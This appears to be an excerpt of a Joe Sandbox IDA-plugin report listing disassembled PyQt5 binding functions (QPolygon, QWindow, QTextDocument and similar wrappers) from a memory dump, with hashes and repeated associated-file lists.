Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?changeAbstractIndex@Index@@0@ItemModelModel@@Persistent
String ID: BJ9J9$QStandardItemModel$changePersistentIndex$changePersistentIndex(self, from_: QModelIndex, to: QModelIndex)
API String ID: 794346470-2745956623
Opcode ID: 4139a89e39ecd0f4a216c32373b7ae54efede32b7b3c8e2767857ec5d7e86d94
Instruction ID: ffa84e5e9ece83013d0da555ffe8c56042e160066f8a1a63b3b52dece64bc99d
Opcode Fuzzy Hash: 4139a89e39ecd0f4a216c32373b7ae54efede32b7b3c8e2767857ec5d7e86d94
Instruction Fuzzy Hash: 2D112076B08F4680DB10DF54E8996AD33B8FB48BA0F914132CA9D43320EF39D95AC340

Function 00007FFD86234EB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

?insert@?$QVector@VQPoint@@@@QEAAXHAEBVQPoint@@@Z.QT5CORE ref: 00007FFD86234F22

Strings

QPolygon, xrefs: 00007FFD86234F5B
insert(self, i: int, value: QPoint), xrefs: 00007FFD86234F45
BiJ9, xrefs: 00007FFD86234ED6
insert, xrefs: 00007FFD86234F54

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?insert@?$Point@@@Point@@@@Vector@
String ID: BiJ9$QPolygon$insert$insert(self, i: int, value: QPoint)
API String ID: 3389726949-3006662640
Opcode ID: 892eb23bc715c5165814baf9bbc987439badb376bb838ed6078980de452a6a17
Instruction ID: d09a27ebcd7d4e1f84ea554cbd668e15715005252389163cd89cb2e47209c098
Opcode Fuzzy Hash: 892eb23bc715c5165814baf9bbc987439badb376bb838ed6078980de452a6a17
Instruction Fuzzy Hash: 3711F376B08B4681DB10DF55E8986AD33A8FB48BA4F954176CA9D43320EF3DD95AC340

Function 00007FFD862A4210 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON

Download Yara Rule

APIs

?removeColumns@QStandardItem@@QEAAXHH@Z.QT5GUI ref: 00007FFD862A4274

Strings

QStandardItem, xrefs: 00007FFD862A42AA
removeColumns(self, column: int, count: int), xrefs: 00007FFD862A4297
Bii, xrefs: 00007FFD862A4237
removeColumns, xrefs: 00007FFD862A42A3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?removeColumns@Item@@Standard
String ID: Bii$QStandardItem$removeColumns$removeColumns(self, column: int, count: int)
API String ID: 3926798594-4095571489
Opcode ID: 3b3523cd00ea608595d68136ec053877b67e2c4b3cfa2bbcbdc12feb1edd0fa9
Instruction ID: 0fbf6fc62dcb7ba2bf9581e11056c7bebd2d4534d3a0615272feb5cfc8ca09e6
Opcode Fuzzy Hash: 3b3523cd00ea608595d68136ec053877b67e2c4b3cfa2bbcbdc12feb1edd0fa9
Instruction Fuzzy Hash: 8E11DF36B18A46C5EB00EF55E8986AD33B4FB48BA4F950132CA5D03720EF39D94AC740

Function 00007FFD86254AB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setBaseSize@QWindow@@QEAAXAEBVQSize@@@Z.QT5GUI ref: 00007FFD86254B13

Strings

BJ9, xrefs: 00007FFD86254AD6
QWindow, xrefs: 00007FFD86254B49
setBaseSize(self, size: QSize), xrefs: 00007FFD86254B36
setBaseSize, xrefs: 00007FFD86254B42

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setBaseSize@Size@@@Window@@
String ID: BJ9$QWindow$setBaseSize$setBaseSize(self, size: QSize)
API String ID: 727068291-3201705680
Opcode ID: 4e2e1fedd88a70d72ad84eab8e1e26607de85365a0510de855532f7356a6795d
Instruction ID: c18c33ec28e67b8cdf744a5de6c84a341cdbb6af206972ffa8ffecee76df7e07
Opcode Fuzzy Hash: 4e2e1fedd88a70d72ad84eab8e1e26607de85365a0510de855532f7356a6795d
Instruction Fuzzy Hash: 3711B675B18E4681EB00AF15E8996AD33A5FB44BA4F554072CA5D43320EF39D959C740

Function 00007FFD8623CAA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?print@QTextDocument@@QEBAXPEAVQPagedPaintDevice@@@Z.QT5GUI ref: 00007FFD8623CB03

Strings

BJ8, xrefs: 00007FFD8623CAC6
print, xrefs: 00007FFD8623CB32
QTextDocument, xrefs: 00007FFD8623CB39
print(self, printer: Optional[QPagedPaintDevice]), xrefs: 00007FFD8623CB26

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?print@Device@@@Document@@PagedPaintText
String ID: BJ8$QTextDocument$print$print(self, printer: Optional[QPagedPaintDevice])
API String ID: 3247112876-1109709291
Opcode ID: e54f717ff7d8eeb4f1e459d088a6db84775da20527e923a9cb65a9e6a31652df
Instruction ID: 21dc131cfb7c0cdb6be145c21dcc1c278b2c608b2e0b4ada56844e2637ea61ed
Opcode Fuzzy Hash: e54f717ff7d8eeb4f1e459d088a6db84775da20527e923a9cb65a9e6a31652df
Instruction Fuzzy Hash: E611C576B18F4681EB00AF15E8996AD33B5FB48BA4FA54032CA5D47320DF3DD95AC740

Function 00007FFD8622CAA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setFormat@QTextObject@@IEAAXAEBVQTextFormat@@@Z.QT5GUI ref: 00007FFD8622CB03

Strings

BJ9, xrefs: 00007FFD8622CAC6
QTextBlockGroup, xrefs: 00007FFD8622CB39
setFormat, xrefs: 00007FFD8622CB32
setFormat(self, format: QTextFormat), xrefs: 00007FFD8622CB26

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?setFormat@Format@@@Object@@
String ID: BJ9$QTextBlockGroup$setFormat$setFormat(self, format: QTextFormat)
API String ID: 760775155-4072990315
Opcode ID: 44f85d05adcbce77b23fd2d63ff28bec46dd1061876498c06537e0e52a13b991
Instruction ID: a168aeb84fcf14feed1b2a22678f534883433eb9b2eb763e8823e284f7a47092
Opcode Fuzzy Hash: 44f85d05adcbce77b23fd2d63ff28bec46dd1061876498c06537e0e52a13b991
Instruction Fuzzy Hash: 2A11C576B18E4681EB009F15E8996AD33B9FB48BA4F954072CA5D43320EF3DD95AC740

Function 00007FFD86236EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?prepend@?$QVector@VQPoint@@@@QEAAXAEBVQPoint@@@Z.QT5CORE ref: 00007FFD86236F43

Strings

prepend(self, value: QPoint), xrefs: 00007FFD86236F66
QPolygon, xrefs: 00007FFD86236F79
BJ9, xrefs: 00007FFD86236F06
prepend, xrefs: 00007FFD86236F72

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?prepend@?$Point@@@Point@@@@Vector@
String ID: BJ9$QPolygon$prepend$prepend(self, value: QPoint)
API String ID: 3196815396-1912935997
Opcode ID: de2d1d025e8c20c1c80b8a85eccf7d5684956124a7556103dcdce2742051c788
Instruction ID: e69158935fc9f66879851152affe03451dab61bb0521c69a187b02ba12b311d6
Opcode Fuzzy Hash: de2d1d025e8c20c1c80b8a85eccf7d5684956124a7556103dcdce2742051c788
Instruction Fuzzy Hash: 6911A276B18E4A81EB009F15E8A96A933B9FB48BA4F954072CA5D03320DF39D959C740

Function 00007FFD86242F20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setDefaultTextOption@QTextDocument@@QEAAXAEBVQTextOption@@@Z.QT5GUI ref: 00007FFD86242F83

Strings

BJ9, xrefs: 00007FFD86242F46
setDefaultTextOption, xrefs: 00007FFD86242FB2
setDefaultTextOption(self, option: QTextOption), xrefs: 00007FFD86242FA6
QTextDocument, xrefs: 00007FFD86242FB9

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?setDefaultDocument@@Option@Option@@@
String ID: BJ9$QTextDocument$setDefaultTextOption$setDefaultTextOption(self, option: QTextOption)
API String ID: 2833480278-1558845357
Opcode ID: 1e4d1277f6c7f99c5e69ad6f23b2b7219def3a753e2c83386412acc69a94761b
Instruction ID: 30f6b29676279cafd2eab1ce1c764a91f8ba09773af2553d2865885d4fd96f31
Opcode Fuzzy Hash: 1e4d1277f6c7f99c5e69ad6f23b2b7219def3a753e2c83386412acc69a94761b
Instruction Fuzzy Hash: 9811C576B18E4A81EB00AF15E8996AD33B5FB48BA4FA54032CA5D43320DF3DD95AC740

Function 00007FFD86255000 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setSizeIncrement@QWindow@@QEAAXAEBVQSize@@@Z.QT5GUI ref: 00007FFD86255063

Strings

BJ9, xrefs: 00007FFD86255026
QWindow, xrefs: 00007FFD86255099
setSizeIncrement, xrefs: 00007FFD86255092
setSizeIncrement(self, size: QSize), xrefs: 00007FFD86255086

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setIncrement@SizeSize@@@Window@@
String ID: BJ9$QWindow$setSizeIncrement$setSizeIncrement(self, size: QSize)
API String ID: 2725467473-3505185438
Opcode ID: 517449d7857dbbbdead0c800da765503aeeb9c71ac757fefef939038c34def3c
Instruction ID: 3b0729584f7c32a13fdb42b4cb2123ef97d5fc4f55ad785e65db2442c8231fcb
Opcode Fuzzy Hash: 517449d7857dbbbdead0c800da765503aeeb9c71ac757fefef939038c34def3c
Instruction Fuzzy Hash: 1B11B675B18E46C1EB00AF15E8996AD33A5FB48BA4F554172CA5D03320EF39D95AC740

Function 00007FFD8622F020 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setPaintDevice@QPaintuser@@QEAAXPEAVQPaintDevice@@@Z.QT5GUI ref: 00007FFD8622F083

Strings

BJ8, xrefs: 00007FFD8622F046
setPaintDevice, xrefs: 00007FFD8622F0B2
QPaintEngine, xrefs: 00007FFD8622F0B9
setPaintDevice(self, device: Optional[QPaintDevice]), xrefs: 00007FFD8622F0A6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Paint$?setDevice@Device@@@user@@
String ID: BJ8$QPaintuser$setPaintDevice$setPaintDevice(self, device: Optional[QPaintDevice])
API String ID: 1401152332-2994605286
Opcode ID: cfb1ccff97155d4f3c5c08ea58655c0ea7a100fe8a3875d8078de9ba9887ef07
Instruction ID: b94308cf2634d5a908af26a5aead22f66ad24bc768a4ee233aa5f8732bc25525
Opcode Fuzzy Hash: cfb1ccff97155d4f3c5c08ea58655c0ea7a100fe8a3875d8078de9ba9887ef07
Instruction Fuzzy Hash: B011C535B18E4691EB01EF15E8A86AD33B9FB48BA4FA54032CA5D43320EF3DD959C740

Function 00007FFD8626ED60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?type@QTextFormat@@QEBAHXZ.QT5GUI ref: 00007FFD8626EDAA
PyBool_FromLong.PYTHON3 ref: 00007FFD8626EDB8

Strings

QTextBlockFormat, xrefs: 00007FFD8626EDDE
isValid, xrefs: 00007FFD8626EDD7
